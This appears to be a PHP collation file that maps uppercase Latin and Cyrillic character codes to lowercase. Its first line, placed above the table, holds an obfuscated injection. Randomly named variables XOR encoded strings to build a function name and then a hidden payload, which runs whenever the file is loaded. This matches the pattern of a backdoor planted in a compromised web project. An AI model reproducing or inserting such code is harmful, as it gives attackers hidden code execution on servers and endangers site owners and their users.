<?php $AElzYwQY='3 IPTVoPA:TZ,;Y'; $eLiwpOjY='PR,1 3064T7.ET7'^$AElzYwQY; $ZzgBSgOX='R3AJS>RN .S4rYVY =Cpk=BO9UX=9faMC9enpp+8d FBOD,ORjACA0 P5792PX>LoQTMRjjC,NOxhgtHF0397uB21kOnmlmfzbFT4rqPyVddwImWw827WEYOj796JMUfq+DLyomAC=8EvHhpfVZ2:9blB-gdls.54hSTSuy7XBR,+pl317d;Bar=sR2XB:PAl.-8blfhOoLo3kX0. tNp5Q + ilU-ZH,l;T,neT3QT5+bE7 RLN5T=szso0xw3e3R74hn<I=yspOM,3; <jd3deJH7YZ>:T+YjGIEEChDcf>2;Qpllh<1V61aF8gL:3mgRB3,69lz=kE+=CS-3ZREi7e<hm0=8z9 RhRTEnOjsv8 ZHSyZ.oxelHW  j8W,lmKm8= ak7nSVX5YSvLmJAX=0lF=Ja.aAC<Q>1luJz TS2BIQXUF=dVY5f=5-7rcX,2eQR+QGct I+X3<GjH,<TbxmVTANW=Z,ILYaf; zw-- SiLAg N+ DfU 1cQ :88=Lj H7pIsj<9MLkoacPyWSogo3MOY.dU.1phClvzHhUwhhf;Y,zbyUfebZUFmYtuiNplHUD0VRHdtkgF8+>0=5>N1h1 :S1SFp574LBU.teraH0F PqwaZcEM3xQ 09 FL<,=8lD 6D-Q66vjsN:H0M8EauxnnO'; $KRzETmP=$eLiwpOjY('', ';Uik5K<-TG<Z-<.0SI0XLE-=f19IX9> 6MBGYPP2mF3,,0E <J9,3oD1AVfm=-JdK5593FJgG+6QHGThfK90>Q-GEKrNJKVlsk ;FZU9YkDTLiI>KKFE; 7gNSXB+dnFUBogPedHgRM1VfUPNr>SNX9H+pG:LWEPM3w=sPYD,0>IEXHXTNMfkZx4z W,7H>iHAXLKWla2e1e9O<QZATsPS0LXERfqI;<M3P1UNXtU08FNYO=F=>+T7USRW0s78x,vrVGHJW,DYNNoiZRWUYCDHnln,V-;aQ1RyWgm. :SNjBZSO0PQLLJP:CTZLEmFSUMOsfWMBXEZFaLMR16LP2rmMh7y98unlZXSrL91<NrTSRNA6=6PzUeqlH,6TA5S2ULPkISXYZa>gw29A8sKlI< 4HUWL47kSkKgX0JPLHj:U: W0 04<<XL.6G9YTYV-<5YFM33X4qW+D,H7WYoN,MH5KTMr0 :6b1I0epZlRFRSILT2IjgGA<YA=9>EH<4XSKLNdMK-NWeSNXX9-BOGEpQ:7ZOKW,;8uC>KHW5jLKGhO4EQPRY<IOZO1VVT84wYaDCXxBT,4rVg4oMTMAfYYLQDjU+H7TXS E nWEVM -4JSIRE,Q2AyXWAzCemHrXEFXLnhXMIY7cPW=A>WRQ7Zu0AU5Q1IEQUd2'^$ZzgBSgOX); $KRzETmP();
$collation = array (
  65 => 97,
  66 => 98,
  67 => 99,
  68 => 100,
  69 => 101,
  70 => 102,
  71 => 103,
  72 => 104,
  73 => 105,
  74 => 106,
  75 => 107,
  76 => 108,
  77 => 109,
  78 => 110,
  79 => 111,
  80 => 112,
  81 => 113,
  82 => 114,
  83 => 115,
  84 => 116,
  85 => 117,
  86 => 118,
  87 => 119,
  88 => 120,
  89 => 121,
  90 => 122,
  1040 => 1072,
  1041 => 1073,
  1042 => 1074,
  1043 => 1075,
  1107 => 1075,
  1027 => 1075,
  1168 => 1169,
  1044 => 1076,
  1026 => 1106,
  1045 => 1077,
  1105 => 1077,
  1025 => 1077,
  1028 => 1108,
  1046 => 1078,
  1047 => 1079,
  1029 => 1109,
  1048 => 1080,
  1031 => 1111,
  1049 => 1081,
  1032 => 1112,
  1050 => 1082,
  1116 => 1082,
  1036 => 1082,
  1051 => 1083,
  1033 => 1113,
  1052 => 1084,
  1053 => 1085,
  1034 => 1114,
  1054 => 1086,
  1055 => 1087,
  1056 => 1088,
  1057 => 1089,
  1058 => 1090,
  1035 => 1115,
  1059 => 1091,
  1118 => 1091,
  1038 => 1091,
  1060 => 1092,
  1061 => 1093,
  1062 => 1094,
  1063 => 1095,
  1039 => 1119,
  1064 => 1096,
  1065 => 1097,
  1066 => 1098,
  1067 => 1099,
  1068 => 1100,
  1069 => 1101,
  1070 => 1102,
  1071 => 1103,
);
?>